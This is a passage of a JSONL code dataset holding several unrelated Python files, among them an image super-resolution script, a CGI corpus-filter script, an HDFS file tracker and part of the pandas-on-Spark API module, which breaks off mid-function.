abs(value-fwhm_crit)/abs(value-prev_value)\n fwhm += shift\n break\n else:\n fwhm += shift\n break\n\n # write results for current channel to string\n result_string = result_string + str(pulse_height) + \",\" + str(pulse_position) + \",\" + str(fwhm) + \",\"\n result_string = result_string + str(baseline_mean) + \",\" + str(baseline_stddev) + \",\" + str(signal_to_noise) + \",\"\n\n\n # write results for current dataset to file\n result_string = result_string[:-1]\n result_string += \"\\n\"\n result_file.write(result_string)\n\n # go to next dataset\n dataset += 1\n\n# close result_file\nresult_file.close()\n","sub_path":"Python_scripts/event_features.py","file_name":"event_features.py","file_ext":"py","file_size_in_byte":5022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"18865604","text":"# NguyenU\n\ndef find_max(nums):\n max = nums[0]\n for y in nums:\n if y > max:\n max = y\n print(max)\n\ndef main():\n find_max([3, 7, 11, 19, 21, 91, 1])\n\nif __name__ == '__main__':\n main()\n","sub_path":"Maths/FindMax.py","file_name":"FindMax.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"310723118","text":"import argparse\n#import time\nimport re\nimport os\nimport torch\nfrom torch.utils.data import DataLoader\nfrom PIL import Image\nfrom torch.autograd import Variable\nfrom torchvision.transforms import ToTensor, ToPILImage\nfrom torch.utils.data.dataset import Dataset\nfrom tqdm import tqdm\n\n\nfrom model import Generator\n\nclass loadfromfolder(Dataset):\n def __init__(self, folder):\n super(loadfromfolder, self).__init__()\n self.folder = folder\n self.files = sorted(os.listdir(self.folder), key=lambda item: int(re.findall(r'\\d+', item)[0]))\n self.filenames = [os.path.join(self.folder, x) for x in self.files]\n\n def __getitem__(self, index):\n return ToTensor()(Image.open(self.filenames[index]))\n\n def __len__(self):\n return len(self.filenames)\n\n def get_name(self, index):\n return self.files[index]\n\nparser = argparse.ArgumentParser(description='Test Multiple Images')\nparser.add_argument('--upscale_factor', default=4, type=int, help='super resolution upscale factor')\nparser.add_argument('--test_mode', default='GPU', type=str, choices=['GPU', 'CPU'], help='using GPU or CPU')\nparser.add_argument('--img_folder', type=str, help='folder with low resolution images')\nparser.add_argument('--save_to', default='./', type=str, help='folder to save generated images to')\nparser.add_argument('--model_name', default='netG_epoch_4_100.pth', type=str, help='generator model epoch name')\nparser.add_argument('--batch_size', default=32, type=int, help='batch size')\nopt = parser.parse_args()\n\nUPSCALE_FACTOR = opt.upscale_factor\nTEST_MODE = True if opt.test_mode == 'GPU' else False\nIMAGE_FOLDER = opt.img_folder\nSAVE_TO = opt.save_to\nMODEL_NAME = opt.model_name\nBATCH_SIZE = opt.batch_size\n\nimage_set = loadfromfolder(IMAGE_FOLDER)\nimage_loader = DataLoader(dataset=image_set, num_workers=0, batch_size=BATCH_SIZE, shuffle=False)\n\nmodel = Generator(UPSCALE_FACTOR).eval()\nif TEST_MODE:\n model.cuda()\n model.load_state_dict(torch.load(MODEL_NAME))\nelse:\n model.load_state_dict(torch.load(MODEL_NAME, map_location=lambda storage, loc: storage))\n\nimg_bar = tqdm(image_loader)\ncount = 0\nfor img in img_bar:\n img_c = Variable(img, volatile=True)\n # print \"SHAPE: \", img_c.shape\n if TEST_MODE:\n img_c = img_c.cuda()\n\n out = model(img_c)\n\n for im in out:\n# print \"SHAPE: \", im.shape, \"TYPE:\", type(im)\n out_im = ToPILImage()(im.data.cpu())\n out_im.save(SAVE_TO + 'processed_' + image_set.get_name(count))\n count += 1 \n\n \n\n# image = Image.open(IMAGE_NAME)\n# image = Variable(ToTensor()(image), volatile=True).unsqueeze(0)\n#if TEST_MODE:\n# image = image.cuda()\n\n#start = time.clock()\n#out = model(image)\n#elapsed = (time.clock() - start)\n#print('cost' + str(elapsed) + 's')\n#out_img = ToPILImage()(out[0].data.cpu())\n#out_img.save('out_srf_' + str(UPSCALE_FACTOR) + '_' + IMAGE_NAME)\n","sub_path":"test_image_batch.py","file_name":"test_image_batch.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"42831266","text":"#!../.interrogatorio/bin/python3\n# -*- coding: UTF-8 -*-\n\nprint(\"Content-type:text/html; charset=utf-8\")\nprint('\\n\\n')\n\nimport os\nimport cgi,cgitb\ncgitb.enable()\nimport re\nimport estrutura_dados\nimport estrutura_ud\nimport interrogar_UD\nfrom datetime import datetime\nimport functions\nfrom functions import tabela, prettyDate\nimport json\nfrom credenciar import LOGIN\nfrom functions import fromInterrogarToHtml, cleanEstruturaUD\nimport html as web\nimport sys\nimport dill as pickle\n\nfrom estrutura_dados import slugify as slugify\n\nform = cgi.FieldStorage()\n\nif not 'pesquisa' in form and not 'action' in form:\n\thtml = 'Filtrar: Interrogatório'\n\thtml += '
'\n\thtml += '





'\n\thtml += '
'\n\tprint(html)\n\nelif not 'action' in form: #or form['action'].value not in ['desfazer', 'view', 'remove']:\n\n\tif LOGIN:\n\t\tif (not 'HTTP_COOKIE' in os.environ) or ('HTTP_COOKIE' in os.environ and not 'conectado' in os.environ['HTTP_COOKIE']):\n\t\t\thtml = ''\n\t\t\tprint(html)\n\t\t\texit()\n\n\tpesquisa = form['pesquisa'].value.strip()\n\tif re.search(r'^\\d+$', pesquisa.split(' ')[0]):\n\t\tcriterio = pesquisa.split(' ')[0]\n\t\tparametros = pesquisa.split(' ', 1)[1]\n\telif len(pesquisa.split('\"')) > 2 or any(x in pesquisa for x in [\"==\", \" = \", \" != \"]):\n\t\tcriterio = '5'\n\t\tparametros = pesquisa\n\telse:\n\t\tcriterio = '1'\n\t\tparametros = pesquisa\n\t\n\twith open('./interrogar-ud/max_crit.txt', 'r') as f:\n\t\tmax_crit = f.read().split()[0]\n\tif int(criterio) > int(max_crit):\n\t\tprint('em desenvolvimento')\n\t\texit()\n\n\tdata = str(datetime.now()).replace(' ', '_').split('.')[0]\n\tud = form['udoriginal'].value\n\tpagina_html = form['html'].value\n\tpesquisa_original = form['pesquisa_original'].value\n\n\tif os.path.isfile('./cgi-bin/json/' + slugify(ud + \"_\" + pesquisa_original.split(\" \", 1)[1] + \".json\")):\n\t\twith open(\"./cgi-bin/json/\" + slugify(ud + \"_\" + pesquisa_original.split(\" \", 1)[1] + \".json\")) as f:\n\t\t\tbusca_original = json.load(f)\n\telse:\n\t\tbusca_original = interrogar_UD.main('./interrogar-ud/conllu/' + ud, int(pesquisa_original.split(\" \", 1)[0]), pesquisa_original.split(\" \", 1)[1], fastSearch=True)\n\tbusca_original = [cleanEstruturaUD(x['resultado'].split(\"# sent_id = \")[1].split(\"\\n\")[0]) for x in busca_original['output']]\n\t\n\tif not 'nome_pesquisa' in form:\n\t\tnome_filtro = form['pesquisa'].value.replace('', '').replace('', '').replace('', '').replace('', '').replace('', '').replace('', '').replace('', '').replace('', '').strip()\n\telse:\n\t\tnome_filtro = form['nome_pesquisa'].value.strip()\n\n\tresultados = interrogar_UD.main('./interrogar-ud/conllu/' + ud, int(criterio), parametros)\n\tif not os.path.isdir('./cgi-bin/json'):\n\t\tos.mkdir('./cgi-bin/json')\n\ttry:\n\t\twith open(\"./cgi-bin/json/\" + slugify(ud + \"_\" + parametros + \".p\"), \"wb\") as f:\n\t\t\tpickle.dump(resultados, f)\n\texcept Exception as e:\n\t\tsys.stderr.write(\"=> \" + str(e))\n\t\tpass\n\n\tif os.path.isfile(\"./cgi-bin/filtros.json\"):\n\t\twith open(\"./cgi-bin/filtros.json\", \"r\") as f:\n\t\t\tfiltros = json.load(f)\n\telse:\n\t\tfiltros = {}\n\t\t\n\tif not pagina_html in filtros:\n\t\tfiltros[pagina_html] = {'ud': ud, 'filtros': {}}\n\tif not nome_filtro in filtros[pagina_html]['filtros']:\n\t\tfiltros[pagina_html]['filtros'][nome_filtro] = {'parametros': [], 'sentences': []}\n\tfiltros[pagina_html]['filtros'][nome_filtro]['sentences'].extend([y for y in [x['resultadoEstruturado'].sent_id for x in resultados['output']] if y in busca_original and y not in [k for filtro in filtros[pagina_html]['filtros'] for k in filtros[pagina_html]['filtros'][filtro]['sentences']]])\n\tfiltros[pagina_html]['filtros'][nome_filtro]['parametros'].append(criterio + ' ' + parametros)\n\n\twith open(\"./cgi-bin/filtros.json\", \"w\") as f:\n\t\tjson.dump(filtros, f)\n\t\t\n\tprint('')\n\nelif form['action'].value == 'desfazer':\n\t\n\tif LOGIN:\n\t\tif (not 'HTTP_COOKIE' in os.environ) or ('HTTP_COOKIE' in os.environ and not 'conectado' in os.environ['HTTP_COOKIE']):\n\t\t\thtml = ''\n\t\t\tprint(html)\n\t\t\texit()\n\n\tnome_html = form['html'].value\n\tnome_filtro = form['filtro'].value\n\n\twith open(\"./cgi-bin/filtros.json\") as f:\n\t\tfiltros = json.load(f)\n\n\tfiltros[nome_html]['filtros'].pop(nome_filtro)\n\n\twith open(\"./cgi-bin/filtros.json\", \"w\") as f:\n\t\tjson.dump(filtros, f)\n\n\tprint(f\"Filtro desfeito, feche esta janela.\")#//window.location = '../interrogar-ud/resultados/{nome_html}.html'\n\nelif form['action'].value == 'view':\n\tnome_html = form['html'].value\n\tnome_filtro = form['filtro'].value\n\n\twith open(\"./cgi-bin/filtros.json\") as f:\n\t\tfiltros = json.load(f)\n\n\tnum_filtros = len(filtros[nome_html]['filtros'][nome_filtro]['sentences'])\n\tud = filtros[nome_html]['ud']\n\tparametros = \"\\n
\".join(filtros[nome_html]['filtros'][nome_filtro]['parametros'])\n\tsentences = filtros[nome_html]['filtros'][nome_filtro]['sentences']\n\n\thtml = ''\n\thtml += ''\n\thtml += \"{title}

{nome_filtro} ({len_filtros})

\\\n\t\t[Lista de sent_id] \\\n\t\t[Desfazer filtro] \\\n\t\t\\\n\t\t
{parametros}

\\\n\t\tBusca inicial: {nome_html}
\\\n\t\tCorpus: {ud}

\".format(\n\t\ttitle=nome_filtro + ' (' + str(num_filtros) + ') - Interrogatório',\n\t\tnome_filtro=web.escape(nome_filtro),\n\t\tnome_filtro_encoded = functions.encodeUrl(nome_filtro),\n\t\tlen_filtros=num_filtros,\n\t\tnome_html=nome_html,\n\t\tud=ud,\n\t\tparametros=parametros,\n\t)\n\n\tresultados = []\n\tsentences_ja_filtrados = []\n\tfor parametros in filtros[nome_html]['filtros'][nome_filtro]['parametros']:\n\t\tif os.path.isfile('./cgi-bin/json/' + slugify(ud + \"_\" + parametros.split(\" \", 1)[1] + \".p\")):\n\t\t\twith open(\"./cgi-bin/json/\" + slugify(ud + \"_\" + parametros.split(\" \", 1)[1] + \".p\"), \"rb\") as f:\n\t\t\t\tbusca = pickle.load(f)\n\t\telse:\n\t\t\tbusca = interrogar_UD.main(f\"./interrogar-ud/conllu/{ud}\", int(parametros.split(\" \", 1)[0]), parametros.split(\" \", 1)[1])\n\t\tfor x in busca['sentences']:\n\t\t\tif x in sentences and x not in sentences_ja_filtrados:\n\t\t\t\tresultados.append(busca['output'][busca['sentences'][x]]['resultadoAnotado'])\n\t\t\t\tsentences_ja_filtrados.append(x)\n\t\n\ttotal = len(resultados)\n\tfor i, resultado in enumerate(resultados):\n\t\thtml += '
[x] {agora} / {maximo} - {sentence}
{text}
{anno}
'.format(\n\t\t\tsentence=cleanEstruturaUD(fromInterrogarToHtml(resultado.sent_id)).strip(),\n\t\t\ttext=fromInterrogarToHtml(resultado.metadados['clean_text'] if 'clean_text' in resultado.metadados else resultado.text),\n\t\t\thtml=nome_html,\n\t\t\tfiltro=web.escape(nome_filtro.replace('\"', \""\")),\n\t\t\tagora=i+1,\n\t\t\tmaximo=total,\n\t\t\tanno=fromInterrogarToHtml(resultado.tokens_to_str()),\n\t\t\t)\n\t\thtml += \"
\"\n\n\thtml += \"

\"\n\tprint(html)\n\nelif form['action'].value == 'remove':\n\tif LOGIN:\n\t\tif (not 'HTTP_COOKIE' in os.environ) or ('HTTP_COOKIE' in os.environ and not 'conectado' in os.environ['HTTP_COOKIE']):\n\t\t\thtml = ''\n\t\t\tprint(html)\n\t\t\texit()\n\n\tnome_html = form['html'].value\n\tnome_filtro = form['filtro'].value\n\tforbidden_sent_id = form['s'].value\n\n\twith open(\"./cgi-bin/filtros.json\") as f:\n\t\tfiltros = json.load(f)\n\n\tfiltros[nome_html]['filtros'][nome_filtro]['sentences'] = [x for x in filtros[nome_html]['filtros'][nome_filtro]['sentences'] if x not in [forbidden_sent_id]]\n\n\twith open(\"./cgi-bin/filtros.json\", \"w\") as f:\n\t\tjson.dump(filtros, f)\n\n\tprint(\"\")\n","sub_path":"www/cgi-bin/filtrar.py","file_name":"filtrar.py","file_ext":"py","file_size_in_byte":10137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"52418077","text":"# -*- coding: utf-8 -*-\nfrom setuptools import setup\n\nimport os\n\n\ntry:\n from pypandoc import convert\n\n def read_md(f):\n return convert(f, 'rst')\n\nexcept ImportError:\n convert = None\n print(\n \"warning: pypandoc module not found, could not convert Markdown to RST\"\n )\n\n def read_md(f):\n return open(f, 'r').read() # noqa\n\nREADME = os.path.join(os.path.dirname(__file__), 'README.md')\n\n\nsetup(\n name='mcok',\n version=\"0.0.2\",\n author='Michał Jaworski',\n author_email='swistakm@gmail.com',\n description=\"Mock mock's Mock\",\n long_description=read_md(README),\n url='https://github.com/pylola/mcok',\n include_package_data=True,\n install_requires=[],\n zip_safe=True,\n py_modules=['mock'],\n\n license=\"BSD\",\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"565739628","text":"#!/anaconda_env/personal/wangsheng/deeplearningD/bin/python\r\nimport sys\r\nimport os\r\nimport subprocess\r\nimport time\r\nfrom datetime import date, timedelta, datetime\r\nfrom pytz import utc, timezone\r\n\r\navro_record_folder = sys.argv[1]\r\navroHDFS = sys.argv[2]\r\n\r\ndef difference(dt):\r\n avro_record_directory = avro_record_folder\r\n date_6chars = dt.strftime('%y%m%d')\r\n os.chdir(avro_record_directory)\r\n try:\r\n text_file = open(os.path.join(avro_record_directory, date_6chars+'.txt'), 'r+')\r\n text_content = text_file.read()\r\n text_content = text_content.split('\\n')[:-1]\r\n except FileNotFoundError:\r\n text_file = open(os.path.join(avro_record_directory, date_6chars+'.txt'), 'w')\r\n text_content = []\r\n\r\n date_8chars = dt.strftime('%Y%m%d')\r\n hdfs_avros = os.path.join(avroHDFS, date_8chars)\r\n all_avro = subprocess.run(['hadoop', 'fs', '-ls', '-t', hdfs_avros], stdout=subprocess.PIPE\r\n ).stdout.decode('utf-8')\r\n all_avro_list = all_avro.splitlines()[1:]\r\n all_avro_list = [i.split(' ')[-1] for i in all_avro_list]\r\n\r\n difference = list(set(all_avro_list).difference(set(text_content)))\r\n if len(difference) == 0: # there is no change in the avro file \r\n latest_file = None\r\n else: \r\n text_file.write(difference[0] + '\\n')\r\n latest_file = difference[0]\r\n text_file.close()\r\n return latest_file\r\n\r\n\r\n\r\nif __name__ == '__main__': \r\n today = datetime.now(timezone('Asia/Singapore'))\r\n yesterday = today - timedelta(days=1)\r\n ystd_file = difference(yesterday)\r\n if not ystd_file:\r\n print(difference(today))\r\n else:\r\n print(ystd_file) ","sub_path":"src/pipeline/get_next_avro.py","file_name":"get_next_avro.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"278437174","text":"from suffix_trees_mc import STree\n\nfrom suffix_tree import Tree\nfrom suffix_tree.node import Internal, Leaf\nfrom suffix_tree import ukkonen\nfrom suffix_tree import ukkonen_gusfield\nfrom SimpleTries import SimpleTrie, SimpleNode\nfrom TreeUtils import merge_trie_vertical, convertSimpleTree\nfrom suffix_tree.util import Path, UniqueEndChar\n\nBUILDERS = [\n ['ukkonen', ukkonen.Builder],\n ['gusfield', ukkonen_gusfield.Builder]\n]\n\n\ndef print_tree(sTreeRoot):\n for links in sTreeRoot.transition_links:\n # for link in links:\n print(links[0])\n if len(links[0].transition_links) > 0:\n print_tree(links[0])\n\n\nchild_list = ['0', '1']\n\n#\n# def convertSimpleTreeFromDot(dot_file):\n# with open(dot_file, 'r') as file:\n# relation = dict()\n# nodes = []\n# for line in file:\n# if ['{', '}'] not in line:\n# if '->' in line:\n# parts = line.split('->')\n# relation[parts[0].strip()] = get_last_char(parts[1].split(' ')[0])\n#\n# else:\n# node_label = line.split(\" \")[0]\n# node_label = get_last_char(node_label)\n# node = SimpleNode(node_label, dict(), None)\n# nodes.append(node)\n\n#\n# def merge_tree_vertical(tree1, tree2, merged_tree):\n# tree1_child = None\n# tree2_child = None\n# # if not merged_tree.parent == None:\n# if not tree1.is_leaf():\n# tree1_child = tree1.children # key=0/1/$\n# else:\n# tree1_child = tree1.__str__().split('$')[0].strip()[-1:]\n# merged_tree.children[tree1_child] = SimpleNode(tree1.__str__().split('$')[1].strip(), merged_tree)\n# if not tree2.is_leaf():\n# tree2_child = tree2.children\n# else:\n# tree2_child = tree2.__str__().split('$')[0].strip()[-1:]\n# merged_tree.children[tree2_child] = SimpleNode(tree2.__str__().split('$')[1].strip(), merged_tree)\n#\n# # if ('0' in tree1_child and '0' in tree2_child):\n# for child in child_list:\n# copied = None\n# if child in tree1_child and child in tree2_child:\n# copied = SimpleNode(child, merged_tree)\n# merged_tree.children[child] = copied\n# # merge_tree_vertical(tree1_child[child], tree2_child[child], copied)\n# if (isinstance(tree1_child, dict) and isinstance(tree2_child, dict)):\n# merge_tree_vertical(tree1_child[child], tree2_child[child], copied)\n# else:\n# if isinstance(tree1_child, dict):\n# # copied = SimpleNode(child, dict(), merged_tree)\n# convertSimpleTree(tree1_child[child], copied)\n# else:\n# convertSimpleTree(tree2_child[child], copied)\n#\n# elif child not in tree1_child and child in tree2_child:\n# # copied = copy.deepcopy(tree2_child[child])\n# copied = SimpleNode(child, merged_tree)\n# if isinstance(tree2_child, dict):\n# convertSimpleTree(tree2_child[child], copied)\n# else:\n# convertSimpleTree(tree2_child, copied)\n# # merged_tree[child] = copied\n# elif child in tree1_child and child not in tree2_child:\n# copied = SimpleNode(child, merged_tree)\n# if isinstance(tree1_child, dict):\n# convertSimpleTree(tree1_child[child], copied)\n# else:\n# convertSimpleTree(tree1_child, copied)\n# # merged_tree[child] = copied\n# else:\n# return\n\n\n#\n# # Suffix-Tree example.\n# # st = STree.STree(\"abcdefghab\")\n# # print(st.find(\"abc\")) # 0\n# # print(st.find_all(\"ab\")) # [0, 8]\n#\n# # Generalized Suffix-Tree example.\n# # a = [\"nonsense\", \"sense\", \"offense\"]\n# a = \"nonsense\"\n# st = STree.STree(a)\n# # print(st.find(\"sen\"))\n# #\n# print_tree(st.root)\n# # print(st.lcs()) # \"abc\"\ntree1 = Tree({'S_0_3': '010'}, builder=ukkonen.Builder)\n# tree2 = Tree({'S21': '111', 'S31': '110'}, builder=ukkonen.Builder)\ntree2 = Tree({'S_4_3': '001'}, builder=ukkonen.Builder)\n\ntestTree10 = SimpleTrie(\"S_4_3\")\nconvertSimpleTree(tree2.root.children['0'], testTree10.root)\n\ntestTree00 = SimpleTrie(\"S_0_3\")\nconvertSimpleTree(tree1.root.children['0'], testTree00.root)\nrest_sequence = SimpleTrie(\"S_0_3\")\nrest_sequence.from_string('101')\ntestTree00.add_tree(rest_sequence)\n\n\ntestTree00_10 = SimpleTrie(\"S_0\")\n# merge_trie_horizontal(testTree00.root, testTree10.root, testTree00_10.root)\nmerge_trie_vertical(testTree00.root, testTree10.root, testTree00_10.root)\n\n# merged_tree = SimpleTree(\"R(0+1)1\")\n# merge_tree_vertical(tree1.root.children['0'], tree2.root.children['0'], merged_tree.root)\n#\n# dot = testTree00_10.to_GraphViz()\n# with open('suffix_tree.dot', 'w') as tmp:\n# tmp.write(dot)\n#\n# dot = testTree10.to_GraphViz()\n# with open('suffix_tree2.dot', 'w') as tmp:\n# tmp.write(dot)\ndot = testTree00.to_GraphViz()\nwith open('suffix_tree2.dot', 'w') as tmp:\n tmp.write(dot)\n\n# print(tree.find('sense'))\n# tree_file = SimpleTree(\"file\").from_GraphViz('suffix_tree1.dot')\n","sub_path":"TreeConstruction/SuffixTreeTest.py","file_name":"SuffixTreeTest.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"87126909","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\"\"\"\nWrappers around spark that correspond to common pandas functions.\n\"\"\"\nfrom typing import (\n Any,\n Callable,\n Dict,\n List,\n Optional,\n Set,\n Sized,\n Tuple,\n Type,\n Union,\n cast,\n no_type_check,\n)\nfrom collections.abc import Iterable\nfrom datetime import tzinfo\nfrom functools import reduce\nfrom io import BytesIO\nimport json\nimport warnings\n\nimport numpy as np\nimport pandas as pd\nfrom pandas.api.types import ( # type: ignore[attr-defined]\n is_datetime64_dtype,\n is_datetime64tz_dtype,\n is_list_like,\n)\nfrom pandas.tseries.offsets import DateOffset\nimport pyarrow as pa\nimport pyarrow.parquet as pq\nfrom pyspark.sql import functions as F, Column as PySparkColumn\nfrom pyspark.sql.functions import pandas_udf\nfrom pyspark.sql.types import (\n ByteType,\n ShortType,\n IntegerType,\n LongType,\n FloatType,\n DoubleType,\n BooleanType,\n TimestampType,\n TimestampNTZType,\n DecimalType,\n StringType,\n DateType,\n StructType,\n DataType,\n)\nfrom pyspark.sql.dataframe import DataFrame as PySparkDataFrame\n\nfrom pyspark import pandas as ps\nfrom pyspark.pandas._typing import Axis, Dtype, Label, Name\nfrom pyspark.pandas.base import IndexOpsMixin\nfrom pyspark.pandas.utils import (\n align_diff_frames,\n default_session,\n is_name_like_tuple,\n is_name_like_value,\n name_like_string,\n same_anchor,\n scol_for,\n validate_axis,\n log_advice,\n)\nfrom pyspark.pandas.frame import DataFrame, _reduce_spark_multi\nfrom pyspark.pandas.internal import (\n InternalFrame,\n DEFAULT_SERIES_NAME,\n HIDDEN_COLUMNS,\n SPARK_INDEX_NAME_FORMAT,\n)\nfrom pyspark.pandas.series import Series, first_series\nfrom pyspark.pandas.spark.utils import as_nullable_spark_type, force_decimal_precision_scale\nfrom pyspark.pandas.indexes import Index, DatetimeIndex, TimedeltaIndex\nfrom pyspark.pandas.indexes.multi import MultiIndex\n\n# For Supporting Spark Connect\nfrom pyspark.sql.utils import get_column_class\n\n__all__ = [\n \"from_pandas\",\n \"range\",\n \"read_csv\",\n \"read_delta\",\n \"read_table\",\n \"read_spark_io\",\n \"read_parquet\",\n \"read_clipboard\",\n \"read_excel\",\n \"read_html\",\n \"to_datetime\",\n \"date_range\",\n \"to_timedelta\",\n \"timedelta_range\",\n \"get_dummies\",\n \"concat\",\n \"melt\",\n \"isna\",\n \"isnull\",\n \"notna\",\n \"notnull\",\n \"read_sql_table\",\n \"read_sql_query\",\n \"read_sql\",\n \"read_json\",\n \"merge\",\n \"merge_asof\",\n \"to_numeric\",\n \"broadcast\",\n \"read_orc\",\n]\n\n\ndef from_pandas(pobj: Union[pd.DataFrame, pd.Series, pd.Index]) -> Union[Series, DataFrame, Index]:\n \"\"\"Create a pandas-on-Spark DataFrame, Series or Index from a pandas DataFrame, Series or Index.\n\n This is similar to Spark's `SparkSession.createDataFrame()` with pandas DataFrame,\n but this also works with pandas Series and picks the index.\n\n Parameters\n ----------\n pobj : pandas.DataFrame or pandas.Series\n pandas DataFrame or Series to read.\n\n Returns\n -------\n Series or DataFrame\n If a pandas Series is passed in, this function returns a pandas-on-Spark Series.\n If a pandas DataFrame is passed in, this function returns a pandas-on-Spark DataFrame.\n \"\"\"\n if isinstance(pobj, pd.Series):\n return Series(pobj)\n elif isinstance(pobj, pd.DataFrame):\n return DataFrame(pobj)\n elif isinstance(pobj, pd.Index):\n return DataFrame(pd.DataFrame(index=pobj)).index\n else:\n raise TypeError(\"Unknown data type: {}\".format(type(pobj).__name__))\n\n\n_range = range # built-in range\n\n\ndef range(\n start: int, end: Optional[int] = None, step: int = 1, num_partitions: Optional[int] = None\n) -> DataFrame:\n \"\"\"\n Create a DataFrame with some range of numbers.\n\n The resulting DataFrame has a single int64 column named `id`, containing elements in a range\n from ``start`` to ``end`` (exclusive) with step value ``step``. If only the first parameter\n (i.e. start) is specified, we treat it as the end value with the start value being 0.\n\n This is like the range function in SparkSession and is used primarily for testing.\n\n Parameters\n ----------\n start : int\n the start value (inclusive)\n end : int, optional\n the end value (exclusive)\n step : int, optional, default 1\n the incremental step\n num_partitions : int, optional\n the number of partitions of the DataFrame\n\n Returns\n -------\n DataFrame\n\n Examples\n --------\n When the first parameter is specified, we generate a range of values up till that number.\n\n >>> ps.range(5)\n id\n 0 0\n 1 1\n 2 2\n 3 3\n 4 4\n\n When start, end, and step are specified:\n\n >>> ps.range(start = 100, end = 200, step = 20)\n id\n 0 100\n 1 120\n 2 140\n 3 160\n 4 180\n \"\"\"\n sdf = default_session().range(start=start, end=end, step=step, numPartitions=num_partitions)\n return DataFrame(sdf)\n\n\ndef read_csv(\n path: Union[str, List[str]],\n sep: str = \",\",\n header: Union[str, int, None] = \"infer\",\n names: Optional[Union[str, List[str]]] = None,\n index_col: Optional[Union[str, List[str]]] = None,\n usecols: Optional[Union[List[int], List[str], Callable[[str], bool]]] = None,\n mangle_dupe_cols: bool = True,\n dtype: Optional[Union[str, Dtype, Dict[str, Union[str, Dtype]]]] = None,\n nrows: Optional[int] = None,\n parse_dates: bool = False,\n quotechar: Optional[str] = None,\n escapechar: Optional[str] = None,\n comment: Optional[str] = None,\n encoding: Optional[str] = None,\n **options: Any,\n) -> Union[DataFrame, Series]:\n \"\"\"Read CSV (comma-separated) file into DataFrame or Series.\n\n Parameters\n ----------\n path : str or list\n Path(s) of the CSV file(s) to be read.\n sep : str, default ‘,’\n Delimiter to use. Non empty string.\n header : int, default ‘infer’\n Whether to use the column names, and the start of the data.\n Default behavior is to infer the column names: if no names are passed\n the behavior is identical to `header=0` and column names are inferred from\n the first line of the file, if column names are passed explicitly then\n the behavior is identical to `header=None`. Explicitly pass `header=0` to be\n able to replace existing names\n names : str or array-like, optional\n List of column names to use. If file contains no header row, then you should\n explicitly pass `header=None`. Duplicates in this list will cause an error to be issued.\n If a string is given, it should be a DDL-formatted string in Spark SQL, which is\n preferred to avoid schema inference for better performance.\n index_col: str or list of str, optional, default: None\n Index column of table in Spark.\n usecols : list-like or callable, optional\n Return a subset of the columns. If list-like, all elements must either be\n positional (i.e. integer indices into the document columns) or strings that\n correspond to column names provided either by the user in names or inferred\n from the document header row(s).\n If callable, the callable function will be evaluated against the column names,\n returning names where the callable function evaluates to `True`.\n mangle_dupe_cols : bool, default True\n Duplicate columns will be specified as 'X0', 'X1', ... 'XN', rather\n than 'X' ... 'X'. Passing in False will cause data to be overwritten if\n there are duplicate names in the columns.\n Currently only `True` is allowed.\n\n .. deprecated:: 3.4.0\n\n dtype : Type name or dict of column -> type, default None\n Data type for data or columns. E.g. {‘a’: np.float64, ‘b’: np.int32} Use str or object\n together with suitable na_values settings to preserve and not interpret dtype.\n nrows : int, default None\n Number of rows to read from the CSV file.\n parse_dates : boolean or list of ints or names or list of lists or dict, default `False`.\n Currently only `False` is allowed.\n quotechar : str (length 1), optional\n The character used to denote the start and end of a quoted item. Quoted items can include\n the delimiter and it will be ignored.\n escapechar : str (length 1), default None\n One-character string used to escape other characters.\n comment: str, optional\n Indicates the line should not be parsed.\n encoding: str, optional\n Indicates the encoding to read file\n options : dict\n All other options passed directly into Spark's data source.\n\n Returns\n -------\n DataFrame or Series\n\n See Also\n --------\n DataFrame.to_csv : Write DataFrame to a comma-separated values (csv) file.\n\n Examples\n --------\n >>> ps.read_csv('data.csv') # doctest: +SKIP\n\n Load multiple CSV files as a single DataFrame:\n\n >>> ps.read_csv(['data-01.csv', 'data-02.csv']) # doctest: +SKIP\n \"\"\"\n # For latin-1 encoding is same as iso-8859-1, that's why its mapped to iso-8859-1.\n encoding_mapping = {\"latin-1\": \"iso-8859-1\"}\n\n if \"options\" in options and isinstance(options.get(\"options\"), dict) and len(options) == 1:\n options = options.get(\"options\")\n\n if mangle_dupe_cols is not True:\n raise ValueError(\"mangle_dupe_cols can only be `True`: %s\" % mangle_dupe_cols)\n if parse_dates is not False:\n raise ValueError(\"parse_dates can only be `False`: %s\" % parse_dates)\n\n if usecols is not None and not callable(usecols):\n usecols = list(usecols) # type: ignore[assignment]\n\n if usecols is None or callable(usecols) or len(usecols) > 0:\n reader = default_session().read\n reader.option(\"inferSchema\", True)\n reader.option(\"sep\", sep)\n\n if header == \"infer\":\n header = 0 if names is None else None\n if header == 0:\n reader.option(\"header\", True)\n elif header is None:\n reader.option(\"header\", False)\n else:\n raise ValueError(\"Unknown header argument {}\".format(header))\n\n if quotechar is not None:\n reader.option(\"quote\", quotechar)\n if escapechar is not None:\n reader.option(\"escape\", escapechar)\n\n if comment is not None:\n if not isinstance(comment, str) or len(comment) != 1:\n raise ValueError(\"Only 